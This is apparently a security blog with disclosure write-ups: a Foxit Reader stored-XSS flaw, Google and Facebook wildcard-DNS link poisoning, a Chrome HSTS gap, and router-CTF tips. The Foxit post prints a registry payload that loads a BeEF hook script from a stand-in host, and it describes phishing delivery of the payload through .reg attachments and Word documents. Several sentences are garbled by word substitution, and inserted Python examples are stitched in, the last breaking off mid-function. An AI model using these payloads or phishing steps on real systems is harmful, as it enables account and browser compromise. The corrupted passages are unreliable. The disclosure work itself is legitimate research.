Recent rumors indicate that this router is going to be used as the base for the OWASP IoT Webgoat and the Damn Vulnerable Embedded Linux.<br /><br />Some alternative approaches you should be taking, and that should be awarded extra points during the contest:<br /><br /><ul><li>Rewrite the bootloader to create a backdoored dual-boot partition</li><li>Backdoor the device in a way that firmware upgrades won't affect it</li><li>Brick the device remotely</li><li>Reprogram the LED to create a PONG game</li></ul><br />There are many things that I still want to write about, but I'm saving that for future posts. If you are going to participate in the <a href="http://sohopelesslybroken.com/">SOHOpelesslyBroken CTF</a> and find this guide useful, feel free to ping me and let's get a coffee together during DEFCON/BsidesLV/Blackhat =)<br /><br />Bernardo Rodrigues (<a href="http://www.blogger.com/profile/09470949514402700579">Blogger profile</a>)<br /><br /><b>Foxit PDF Reader Stored XSS</b><br />Published 2014-07-07, updated 2014-07-16<br /><br />A friend of mine was performing an external pentest recently and he started to mutter that his traditional Java exploits were not being effective. He was able to map a few applications and defenses in place protecting the client's network, but he still needed an initial access to start pivoting.<br /><br />Basic protections like AV and white-listing, as well as more advanced ones like EMET, are used to make the life of criminals (and pentesters) harder, but they're often bypassed. While discussing alternatives with my friend, he told me that the company replaced Adobe Reader after seeing lots of Security Advisories for the product. And what was the replacement? 
Foxit Reader:<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-zrxieDL32dc/U4AN3DUf3qI/AAAAAAAAAYA/1kw7Idy4zrY/s1600/chart.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-zrxieDL32dc/U4AN3DUf3qI/AAAAAAAAAYA/1kw7Idy4zrY/s1600/chart.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Advisories for Adobe Reader and Foxit Reader listed on <a href="http://www.osvdb.com/">OSVDB</a> (May/2014)</td></tr></tbody></table>Fewer advisories means that the product is more secure, right? <a href="https://twitter.com/mruef">Marc Ruef</a>'s talk about <a href="http://www.scip.ch/publikationen/praesentationen/scip_area41-2014_vuldb.pdf">VDB management</a> summarizes this point:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-1ifAaWVito0/U7bEDcEoc4I/AAAAAAAAAZM/NWwe6fG7ENg/s1600/talk.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-1ifAaWVito0/U7bEDcEoc4I/AAAAAAAAAZM/NWwe6fG7ENg/s1600/talk.PNG" height="368" width="640" /></a></div><br />The moment I heard the words Foxit Reader I remembered an old exploit I created a long time ago. The vulnerability wasn't that critical, but I knew that it would fit the situation (and this blog post).<br /><div style="text-align: left;"><br /></div>As I was about to release it publicly, I notified the vendor and waited for them to patch it. 
I had some problems with their security contact and had to mail them twice, but they answered within a couple of days, patching the product and releasing an advisory (no CVE is assigned to this vulnerability at the time of writing).<br /><br /><b>Security Advisory</b><br /><b><br /></b><a href="http://www.foxitsoftware.com/support/security_bulletins.php#FRD-21">http://www.foxitsoftware.com/support/security_bulletins.php#FRD-21</a><br /><br /><b>Fixed a security issue caused by the Stored XSS vulnerability when reading and displaying filenames and their paths on the “Recent Documents” section from the Start Page.</b><br /><br /><b>Summary</b><br /><b><br /></b>Foxit Reader 6.2.1, Foxit Enterprise Reader 6.2.1, and Foxit PhantomPDF 6.2.1 fixed a security issue caused by the Stored XSS vulnerability when reading and displaying filenames and their paths on the “Recent Documents” section from the Start Page. Attackers could tamper with the registry entry and cause the application to load malicious files.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-n2BF95xIeCo/U7bHkb8bv-I/AAAAAAAAAZk/LSUOzDcX1Xc/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-n2BF95xIeCo/U7bHkb8bv-I/AAAAAAAAAZk/LSUOzDcX1Xc/s1600/1.PNG" height="307" width="400" /></a></div><br />When opening a PDF, Foxit creates a "FileX" registry entry with the document's complete path:<br /><div><div><br /></div><div>[HKEY_CURRENT_USER\Software\Foxit Software\Foxit Reader 6.0\Recent File List]</div><div>"File1"="C:\\w00t.pdf"</div><div><br /></div><div>Whenever you open a document, Foxit 6.x displays the start panel on a different tab by default. 
All you need to do is edit the registry and place your XSS payload (or the <a href="http://beefproject.com/">BeEF</a> hook) on the FileX entry:</div><br /><div class="code">C:\Users\Admin\Desktop&gt;type reg.reg<br /><br />Windows Registry Editor Version 5.00<br /><br />[HKEY_CURRENT_USER\Software\Foxit Software\Foxit Reader 6.0\Recent File List]<br />"File1"="C:\\w00t.pdf&lt;script src=\"http://BEEF/hook.js\"&gt;&lt;/script&gt;"<br /><br />C:\Users\Admin\Desktop&gt;reg import reg.reg<br />The operation completed successfully.</div><div><br /></div><div>Now wait for the victim to open any PDF file (using Foxit Reader):<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-xhCnoUhCTEE/U7bHkSWbTRI/AAAAAAAAAZY/s8nFjjoH6hQ/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-xhCnoUhCTEE/U7bHkSWbTRI/AAAAAAAAAZY/s8nFjjoH6hQ/s1600/2.PNG" height="227" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-WppQZMm0eqE/U7bHk2kLLXI/AAAAAAAAAZg/S-s1clypWyQ/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-WppQZMm0eqE/U7bHk2kLLXI/AAAAAAAAAZg/S-s1clypWyQ/s1600/3.PNG" height="306" width="400" /></a></div><b><br /></b><b>Affected Versions</b></div></div><br />Foxit Reader 6.2.0.0429 and earlier<br />Foxit Enterprise Reader 6.2.0.0429 and earlier<br />Foxit PhantomPDF 6.2.0.0429 and earlier<br /><br /><b>Solution</b><br /><br />Upgrade to Foxit Reader 6.2.1, Foxit Enterprise Reader 6.2.1, or Foxit PhantomPDF 6.2.1.<br /><br /><b>Security Process</b><br /><br />2014-05-24: <a href="https://twitter.com/bernardomr">Bernardo Rodrigues</a> found the issue;<br />2014-06-03: Core Security Technologies confirmed the issue;<br />2014-06-11: Foxit fixed the issue;<br />2014-07-01: Foxit released the fixed version of 
Foxit Reader 6.2.1/Foxit Enterprise Reader 6.2.1/Foxit PhantomPDF 6.2.1.<br /><div><br /><b>Foxit Reader XSS + Phishing</b><br /><b><br /></b>I know, the bug does not seem to be that good and would have no use during a pentest engagement. When I first found this flaw, I could basically think of three ways to compromise the user's Foxit Reader installation:<br /><br /><b>1 - Sending a PDF with the XSS payload on the filename</b><br /><br />That would be the ideal solution, but I was unable to craft a file with the XSS payload and open it on a Windows system. Microsoft Windows won't create filenames with special chars like &lt;, &gt; and /, so I booted my Linux VM, created a file called &lt;plaintext&gt;.pdf and compressed it into test.zip.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-U9nIFVtFjNM/U7bxRv3MOMI/AAAAAAAAAaI/MCB9ZjrxvsA/s1600/x2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-U9nIFVtFjNM/U7bxRv3MOMI/AAAAAAAAAaI/MCB9ZjrxvsA/s1600/x2.PNG" height="228" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-CuJiLc4Cwwg/U7bxRtsCzdI/AAAAAAAAAaM/hPzRmw4KGE4/s1600/x1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-CuJiLc4Cwwg/U7bxRtsCzdI/AAAAAAAAAaM/hPzRmw4KGE4/s1600/x1.PNG" height="245" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-fsZFFMlx1iQ/U7bxRtDwPPI/AAAAAAAAAaE/rMjeYDQegPk/s1600/x3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-fsZFFMlx1iQ/U7bxRtDwPPI/AAAAAAAAAaE/rMjeYDQegPk/s1600/x3.PNG" height="182" width="400" /></a></div><br />When double clicking the file on WinRAR, the OS won't open it. 
If we drag it to the Foxit Reader window, the special chars are replaced and the XSS payload won't load.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-61D0XLc1_cU/U7bxSCFCMYI/AAAAAAAAAaY/64S7xiK0n1U/s1600/x4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-61D0XLc1_cU/U7bxSCFCMYI/AAAAAAAAAaY/64S7xiK0n1U/s1600/x4.PNG" height="140" width="320" /></a></div><br />I tried to use alternative encodings and different XSS vectors, but I couldn't exploit it properly on Windows. If you have any better idea please <a href="https://twitter.com/bernardomr">let me know</a>.<br /><br /><b>2 - Send a .reg to the user and ask him to double click it</b><br /><br />Most people won't click on executable attachments on e-mails: that's why <a href="http://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-cpl-malware/">Brazilian criminals distribute malware using CPL files</a>, for example. 
Some e-mail providers like Outlook block .reg attachments, but many other services like Gmail won't block them:<br /><br />Registry file blocked on Outlook:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-jC4wUmeHBeg/U7ckqmazvmI/AAAAAAAAAa4/HsV3MHk_cSs/s1600/outlook.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-jC4wUmeHBeg/U7ckqmazvmI/AAAAAAAAAa4/HsV3MHk_cSs/s1600/outlook.PNG" /></a></div>Registry file attached on Gmail:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-qBGVXr5jaI4/U7ckqkn98xI/AAAAAAAAAa0/MjJsz3j1xg4/s1600/gmail.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-qBGVXr5jaI4/U7ckqkn98xI/AAAAAAAAAa0/MjJsz3j1xg4/s1600/gmail.PNG" height="182" width="320" /></a></div><br /><b>3 - Embed the .reg object on a RTF or Word Document and instruct the user to run it</b><br /><br />There's a video for this one, featuring <a href="http://beefproject.com/">BeEF</a>, your favorite <strike>Browser</strike> PDF Reader Exploitation Framework Project =)<br /><div style="text-align: center;"><br /></div><div style="text-align: center;"><iframe allowfullscreen="yes" frameborder="0" height="344" src="//www.youtube.com/embed/74OgNhCDGKo" width="459"></iframe><br /></div><div style="text-align: center;"><br /></div><div style="text-align: left;">The interesting part here is that the PDF Reader is not subject to the Same-Origin Policy, and the hook can be used as a reliable proxy to the internal network.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-EN5jF73zxe0/U7jlCSfP9MI/AAAAAAAAAbM/trS-1AU-6h4/s1600/vid3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-EN5jF73zxe0/U7jlCSfP9MI/AAAAAAAAAbM/trS-1AU-6h4/s1600/vid3.PNG" height="176" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>This is also one of the rare scenarios where you can run "localhost" exploits from BeEF, as long as the user accepts the prompted ActiveX warning:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-cmpWo39DYss/U7jlkb-8WKI/AAAAAAAAAbY/H2exF6rzBiQ/s1600/vid1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-cmpWo39DYss/U7jlkb-8WKI/AAAAAAAAAbY/H2exF6rzBiQ/s1600/vid1.PNG" height="154" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-j5FdyX3pdiM/U7jlkgQoK3I/AAAAAAAAAbc/ZqwHHc779rs/s1600/vid2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-j5FdyX3pdiM/U7jlkgQoK3I/AAAAAAAAAbc/ZqwHHc779rs/s1600/vid2.PNG" height="396" width="640" /></a></div><br /><br /><b>Conclusion</b></div><div><b><br /></b>You may be asking "why not embed malware in the document?". Firstly because this is a noisy technique and most AV/whitelisting products would detect this attempt. You could also modify the user's registry to <a href="http://www.shelliscoming.com/2013/12/metasploit-controlling-internet.html">load a PAC file on the browser</a> or use powershell scripts to bypass some restrictions, but in this case there would be no need for this blog post =)<br /><br /></div><div>It doesn't matter how secure your product is or how many vulnerabilities were disclosed for it: if you're targeted by big Offensive players, you're certainly getting pwned. 
If other less sophisticated attackers want to attack you, they'll pwn you as well, because people still fall for phishing.<br /><br />What makes your security posture better is how you detect and respond to these threats. I like approaches like the one described by Haifei Li &amp; Chong Xu at CanSecWest 2014. Their talk on <a href="https://cansecwest.com/slides/2014/Exploit%20detection%20-%20Exploring_In_the_Wild_final.pdf">Exploit Detection</a> described how "DNA comparison" can be used to flag and detect an application's unusual behavior, leading to exploit discovery:<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-m6liIg33FA4/U7bLcQ6xvHI/AAAAAAAAAZ0/oGcLyHrRuD4/s1600/slides.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-m6liIg33FA4/U7bLcQ6xvHI/AAAAAAAAAZ0/oGcLyHrRuD4/s1600/slides.PNG" height="235" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://cansecwest.com/slides/2014/Exploit%20detection%20-%20Exploring_In_the_Wild_final.pdf">Exploit Detection</a>, Haifei Li &amp; Chong Xu (CanSecWest 2014)</td></tr></tbody></table><br />In this simple phishing scenario, Microsoft Word (and WordPad) drops a registry file on the %TEMP% folder as soon as the file is opened. This is clearly an unusual behavior and should be flagged by security solutions. This could also be used as an IOC to analyze big sets of files/documents.<br /><br /><a href="https://twitter.com/randomdross">David Ross</a> made a post recently describing lots of different scenarios for XSS persistence. 
This is yet another XSS persistence mechanism that could be used to backdoor compromised systems, for example.<br /><div><br /></div>I hope you enjoyed this two page write-up about XSS, because, you know, everybody likes hearing about cool hacking techniques and...<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-rOo6vOQAxCA/U3_sXfXP1_I/AAAAAAAAAW4/VntHFCcPD70/s1600/xss1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-rOo6vOQAxCA/U3_sXfXP1_I/AAAAAAAAAW4/VntHFCcPD70/s1600/xss1.PNG" /></a></div><br />...Well, at least there was a cool Youtube video showing a cool BeEF hook and...<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-_kDSVtwY3jA/U3_sXU9HtrI/AAAAAAAAAW0/v8v8tAfhmws/s1600/xss2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-_kDSVtwY3jA/U3_sXU9HtrI/AAAAAAAAAW0/v8v8tAfhmws/s1600/xss2.PNG" /></a></div><div><br /></div><div>Hm, I'd better finish this post with a Dilbert comic.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://www.dilbert.com/strips/comic/2014-05-19/"><img border="0" src="http://4.bp.blogspot.com/-u_uNotTcHBI/U4P7NYHWngI/AAAAAAAAAYc/EGCBSw-kzrw/s1600/221657.strip.gif" height="198" width="640" /></a></div></div>Bernardo Rodrigues (<a href="http://www.blogger.com/profile/09470949514402700579">Blogger profile</a>)<br /><br /><b>Wildcard DNS, Content Poisoning, XSS and Certificate Pinning</b><br />Published 2014-03-31, updated 2014-07-16<br /><br />Hi everyone, this time I'm going to talk about an interesting vulnerability that I reported to Google and Facebook a couple of months ago. 
I had some spare time last October and I started testing for vulnerabilities on a few companies with established bug bounty programs. Google awarded me with $5000,00 and Facebook paid me $500,00 for reporting the bugs.<br /><br />I know you may be more interested in highly sophisticated exploits that allow <a href="http://seclists.org/fulldisclosure/2014/Mar/123">arbitrary file upload to the Internet</a>, with custom payloads that may lead to unexpected behavior like <a href="http://seclists.org/fulldisclosure/2014/Mar/332">closing Security Lists</a>. Hopefully this class of bugs is already <a href="http://seclists.org/fulldisclosure/2014/Mar/333">patched by Fyodor</a> and Attrition is offering an <a href="http://attrition.org/postal/asshats/">efficient exploit mitigation technique</a>.<br /><br />The title may be a little confusing, but I'm going to show that it's possible to combine all these techniques to exploit vulnerable systems.<br /><br /><b>Content Poisoning and Wildcard DNS</b><br /><br />Host header poisoning occurs when the application doesn't validate full URL's generated from the HTTP Host header, including the domain name. Recently, the <a href="https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/">Django Framework</a> fixed a few vulnerabilities related to that and <a href="https://twitter.com/albinowax">James Kettle</a> made an interesting <a href="http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html">post discussing lots of attack scenarios</a> using host header attacks.<br /><br />While testing this issue, I found a different kind of Host header attack that abuses the possibility to access wildcard domains. 
Let's have a quick look at the <a href="https://en.wikipedia.org/wiki/Hostname">Wikipedia entry on Hostnames</a>:<br /><blockquote class="tr_bq"><div>"The Internet standards (<a href="https://en.wikipedia.org/wiki/Request_for_Comments" title="Request for Comments">Request for Comments</a>) for protocols mandate that component hostname labels may contain only the <a href="https://en.wikipedia.org/wiki/ASCII" title="ASCII">ASCII</a> letters 'a' through 'z' (in a case-insensitive manner), the digits '0' through '9', and the <a href="https://en.wikipedia.org/wiki/Hyphen" title="Hyphen">hyphen</a> ('-'). <b>The original specification of hostnames in <a class="external mw-magiclink-rfc" href="https://tools.ietf.org/html/rfc952" rel="nofollow">RFC 952</a>, mandated that labels could not start with a digit or with a hyphen, and must not end with a hyphen</b>. However, a subsequent specification (<a class="external mw-magiclink-rfc" href="https://tools.ietf.org/html/rfc1123" rel="nofollow">RFC 1123</a>) permitted hostname labels to start with digits. No other symbols, punctuation characters, or white space are permitted."</div></blockquote>The fun part here is that the network stacks of Windows, Linux and Mac OS X consider domains like -www.plus.google.com, www-.plus.google.com and www.-.plus.google.com valid. It's interesting to note that Android won't resolve these domains for some reason.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/---Lf_4cs_7U/UzgiwPacBpI/AAAAAAAAAUA/wLVp_aOVdYs/s1600/Screenshot_2014-03-30-10-54-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/---Lf_4cs_7U/UzgiwPacBpI/AAAAAAAAAUA/wLVp_aOVdYs/s1600/Screenshot_2014-03-30-10-54-39.png" height="240" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-ZqWV4ATP_4w/UzgiwN8azFI/AAAAAAAAAT8/w62Oh9nI4qk/s1600/Screenshot+from+2014-03-30+10%5E%2556%5E%2513.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-ZqWV4ATP_4w/UzgiwN8azFI/AAAAAAAAAT8/w62Oh9nI4qk/s1600/Screenshot+from+2014-03-30+10%5E%2556%5E%2513.png" height="192" width="640" /></a></div><br />Take, for example, the following URL: https://www.example.com.-.www.sites.google.com. 
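As an added example (not code from the original post), the check below shows which of the hostnames above actually pass the RFC 952/1123 label grammar, and why an application that builds e-mail links must still compare the Host header against an allowlist of hosts it knows it serves: the allowlist and the sample hosts are constructed for the demo.

```python
import re

# One hostname label per RFC 952/1123: 1-63 alphanumerics or hyphens,
# neither starting nor ending with a hyphen (RFC 1123 allows a leading digit).
_LABEL_RE = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$", re.IGNORECASE)


def is_rfc1123_hostname(host: str) -> bool:
    """True if every dot-separated label of `host` satisfies the RFC grammar.

    The resolvers on Windows/Linux/OS X still resolve names that fail this
    check (a bare '-' label, for instance), which is what the wildcard DNS
    trick relies on, so a syntax check is a detection aid, not a defense.
    """
    host = host.rstrip(".")  # tolerate the FQDN trailing dot
    if not host or len(host) > 253:
        return False
    return all(_LABEL_RE.match(label) for label in host.split("."))


def normalize_host_header(host_header: str) -> str:
    """Strip an optional :port and trailing dot, and lower-case the rest."""
    return host_header.split(":", 1)[0].rstrip(".").lower()


def build_confirmation_link(host_header: str, path: str, allowed_hosts: frozenset):
    """Return an absolute URL for an e-mail only when the Host header is one of
    the hosts the application is known to serve; otherwise return None.

    Syntax validation alone is not enough: 'www.example.com-----www.drive.google.com'
    is a perfectly valid RFC 1123 name and would still poison the link, which is
    why hard-coding (allowlisting) the proper host is the fix that works.
    """
    host = normalize_host_header(host_header)
    if host not in allowed_hosts:
        return None
    return f"https://{host}{path}"


# Constructed allowlist for the demo; a real deployment loads it from config.
ALLOWED_HOSTS = frozenset({"www.facebook.com", "zero.facebook.com"})

# Hostnames discussed in the post, paired with the expected RFC verdict.
SAMPLE_HOSTS = {
    "-www.plus.google.com": False,                     # label starts with '-'
    "www-.plus.google.com": False,                     # label ends with '-'
    "www.-.plus.google.com": False,                    # bare '-' label
    "www.example.com.-.www.sites.google.com": False,   # bare '-' label
    "www.example.com-----www.drive.google.com": True,  # hyphens inside a label are legal
    "w00t.sites.google.com": True,
}

if __name__ == "__main__":
    for name, expected in SAMPLE_HOSTS.items():
        print(f"{name:45} rfc1123={is_rfc1123_hostname(name)!s:5} expected={expected}")
    print(build_confirmation_link("zero.facebook.com", "/confirm?token=EXAMPLE", ALLOWED_HOSTS))
    print(build_confirmation_link("www.example.com.-.zero.facebook.com", "/confirm?token=EXAMPLE", ALLOWED_HOSTS))
```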
If we compose an e-mail and paste it on the body, GMail will split them and the received message will have two “clickable” parts (<a href="https://www.example.com/">https://www.example.com</a> and <a href="http://sites.google.com/">sites.google.com</a>).<br /><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-qgCNZQdQzlE/UzgjutK9P3I/AAAAAAAAAUQ/BAR5NY2hhdw/s1600/test.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-qgCNZQdQzlE/UzgjutK9P3I/AAAAAAAAAUQ/BAR5NY2hhdw/s1600/test.png" height="156" width="640" /></a></div><br />Most e-mail based notifications use the very same host you are browsing in order to compose the notification messages: you see where this is going, right?<br /><br />Facebook has a wildcard DNS entry at zero.facebook.com. In order to exploit the flaw, we have to access the service using a poisoned URL and perform actions that may need e-mail confirmation, checking whether Facebook mails the crafted URL to the user.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-1B81AkzCFao/Uzglkpa1KDI/AAAAAAAAAUk/lFpNdPxuvb4/s1600/header2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-1B81AkzCFao/Uzglkpa1KDI/AAAAAAAAAUk/lFpNdPxuvb4/s1600/header2.PNG" height="324" width="640" /></a></div><br />The only vulnerable endpoint that I found affected by this issue was the registration e-mail confirmation. You may be asking, how could one exploit this to attack a legitimate user?<br /><br />Suppose I want to attack the Facebook account from goodguy@example.com. I can create or associate a "duplicate" account using the "+" sign by browsing Facebook with these injected URL's. 
If I navigate to Facebook using an URL like https://www.example.com.-.zero.facebook.com, all I have to do is create the indistinguishable worth goodguy+DUPLICATE@example.com. Most e-mail services like GMail and Hotmail don't consider what you type without the "+" and forward it to the original account.<br /><br />In this case, all e-mails that Facebook sent to personize that undertone had the poisoned links.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-lISzaLW9ZY0/UzgnNSMlrZI/AAAAAAAAAVM/k4qreRY5R-U/s1600/Capturar.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-lISzaLW9ZY0/UzgnNSMlrZI/AAAAAAAAAVM/k4qreRY5R-U/s1600/Capturar.PNG" height="170" width="640" /></a></div><br />This can moreover be used to poison password reset emails, but Facebook forms were not affected. They quickly stock-still that by nonflexible coding the proper URL to their e-mail confirmation system. It's moreover possible (but not recommended) to fix these issues by sending notifications with relative links instead of well-constructed URL's ("please click <a href="http://www.example.com.-.zero.facebook.com/">here</a>" instead of "please click on the specified url:&nbsp;<a href="http://www.example.com/">www.example.com</a>.-.<a href="http://zero.facebook.com/">zero.facebook.com</a>").<br /><br /><b>XSS and Wildcard DNS</b><br /><br />While searching for these issues on Google I quickly found wildcard domains like:<br /><br />-&nbsp;<a href="https://w00t.drive.google.com/">https://w00t.drive.google.com</a><br />-&nbsp;<a href="https://w00t.script.google.com/">https://w00t.script.google.com</a><br />-&nbsp;<a href="https://w00t.sites.google.com/">https://w00t.sites.google.com</a><br /><br />In specimen you're wondering how to quickly find these wildcard domains, you can download and lookup for them on the <a href="https://scans.io/">scans.io datasets</a>. 
You can find these references on the Reverse DNS records or by searching for SSL certificates issued to wildcard domains, like *.sites.google.com.<br /><br />During my initial tests, I was unable to craft URL's using .-. inside the drive.google.com domain (got 500 error messages) and all I could do was creating URL’s like this: https://www.example.com-----www.drive.google.com.<br /><br />When you scan GoogleMomentumusing this URL, upload a File to a Folder and try to Zip/Download it asking for an e-mail confirmation (“Email when ready”), the e-mail confirmation message will be like this:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-3x_JzGtJ20U/Uzg2jk4xLyI/AAAAAAAAAVY/T4ms46p38g8/s1600/zipp.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-3x_JzGtJ20U/Uzg2jk4xLyI/AAAAAAAAAVY/T4ms46p38g8/s1600/zipp.PNG" height="170" width="640" /></a></div><br />The "ready for downloading" link would point to https://www.example.com-----www.drive.google.com/export-result?archiveId=REDACTED. So far no big deal, I was still unable to poison the links... And phishing yourself is not that useful =)<br /><br />I kept testing variegated URL's until I found a weird policies on Google DNS Servers. 
When typing URLs containing a domain you control, followed by a certain number of "-" and the wildcard domain from Google, the resolved IP would be the one of the domain you control.<br /><br />(Screenshot: My highly sophisticated Fuzzer in action)<br /><br />For some reason, there was a glitch in their DNS servers, more specifically in the regexp that stripped "--" from the domain prefixes. I'm not sure why they performed these checks, but it may have something to do with <a href="https://en.wikipedia.org/wiki/Internationalized_domain_name">Internationalized Domain Names</a>.<br /><br />(<a href="https://xkcd.com/1171/">XKCD's take on the bug</a>)<br /><br />Some Google domains affected by this issue (October 2013):<br /><br />- docs.google.com<br />- docs.sandbox.google.com<br />- drive.google.com<br />- drive.sandbox.google.com<br />- glass.ext.google.com<br />- prom-qa.sandbox.google.com<br />- prom-test.sandbox.google.com<br />- sandbox.google.com<br />- script.google.com<br />- script.sandbox.google.com<br />- sites.google.com<br />- sites.sandbox.google.com<br /><br /><div>Now that I can impersonate a Google domain, it's possible to abuse the Same Origin Policy and issue requests on behalf of a logged-in user. <a href="http://twitter.com/lcamtuf">lcamtuf</a> once told us about <a href="http://lcamtuf.blogspot.com.br/2010/10/http-cookies-or-how-not-to-design.html">HTTP cookies, or how not to design protocols</a>. What happens if we control www.example.com and a user logged into drive.google.com visits the crafted URL http://www.example.com---.drive.google.com?</div><br />The request to the legitimate hostname goes to the legitimate site; the request to the crafted hostname goes to the user-controlled site, in this case my own server running nginx.<br /><br />This amounts to an XSS-like attack: you have bypassed the same-origin policy and can, for example, steal cookies and run scripts in the context of the site.<br /><br /><b>Certificate Pinning and Wildcard DNS</b><br /><br />So far so good, but what if we performed the same tests on Google Chrome, which enforces certificate pinning for Google domains? I didn't notice at first, but I accidentally found an issue in Chrome too: it was failing to perform the proper HSTS checks for these non-RFC-compliant domains.<br /><br />Other parts of the network stack were processing and fetching results for these "invalid" DNS names, but TransportSecurityState was rejecting them and therefore HSTS policies didn't apply. They simply removed the sanity checks to make TransportSecurityState more promiscuous in what it processes.<br /><br />You can easily reproduce this on Chrome prior to v31: proxy Chrome through OWASP ZAP (accepting its certificate) and visit URLs like https://sites.google.com; Chrome will display a "heightened security" error message. If you type URLs like https://www-.sites.google.com or https://www-.plus.google.com instead, Chrome offers the option to "Proceed anyway". 
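Both issues in this post come down to how a hostname gets checked: the notification link built from an attacker-shaped Host header, and an HSTS lookup that gave up on a non-RFC-compliant name. The following is an added example written for this page, not code from the post, Facebook or Chromium; the preload table, hosts and paths are constructed, and hsts_entry_for only mimics the behaviour the post describes, not Chromium's real lookup.

```python
import re
from typing import Dict, Optional

# RFC 1123 label: 1-63 chars of letters, digits and '-', never starting or ending with '-'.
LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def is_rfc1123_hostname(host: str) -> bool:
    """Syntax check only: every label must match LABEL_RE and the whole name must fit in 253 chars."""
    host = host.rstrip(".")
    if not host or len(host) > 253:
        return False
    return all(LABEL_RE.match(label) for label in host.split("."))


def link_from_request_host(request_host: str, trusted_suffix: str, path: str) -> Optional[str]:
    """Weak pattern: build a notification link from the Host header after a syntax and suffix check.
    The syntax check stops the '.-.' hosts, but with a wildcard DNS record under trusted_suffix any
    syntactically valid prefix (e.g. 'www.example.com-----www') still gets through."""
    host = request_host.lower().rstrip(".")
    if not is_rfc1123_hostname(host):
        return None
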